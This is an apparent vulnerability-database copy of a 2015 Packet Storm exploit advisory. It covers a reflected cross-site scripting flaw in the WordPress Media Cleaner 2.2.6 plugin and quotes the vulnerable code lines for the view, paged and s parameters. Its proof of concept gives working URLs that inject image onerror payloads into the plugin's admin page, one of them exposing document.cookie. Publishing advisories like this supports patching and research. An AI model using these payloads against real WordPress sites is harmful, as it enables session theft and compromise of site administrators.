Lucene search
K

WordPress Media Cleaner 2.2.6 Cross Site Scripting

🗓️ 27 Feb 2015 00:00:00Reported by Ismail SaygiliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Wordpress Media Cleaner 2.2.6 Cross Site Scripting vulnerability in view, paged, and s parameter

Code
`# Exploit Title: Wordpress Media Cleaner - XSS  
# Author: İsmail SAYGILI  
# Web Site: www.ismailsaygili.com.tr  
# E-Mail: [email protected]  
# Date: 2015-02-26  
# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip  
# Version: 2.2.6  
  
  
# Vulnerable File(s):  
[+] wp-media-cleaner.php  
  
# Vulnerable Code(s):  
[+] 647. Line  
$view = $_GET['view'] : "issues";   
[+] 648. Line   
$paged = $_GET['paged'] : 1;  
[+] 653. Line  
$s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;  
  
# Request Method(s):  
[+] GET  
  
# Vulnerable Parameter(s):  
[+] view, paged, s  
  
  
  
# Proof of Concept  
  
--> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS}  
  
--> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.cookie)>&s="><img src=i onerror=prompt(/XSS/)>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Feb 2015 00:00Current
0.1Low risk
Vulners AI Score0.1
19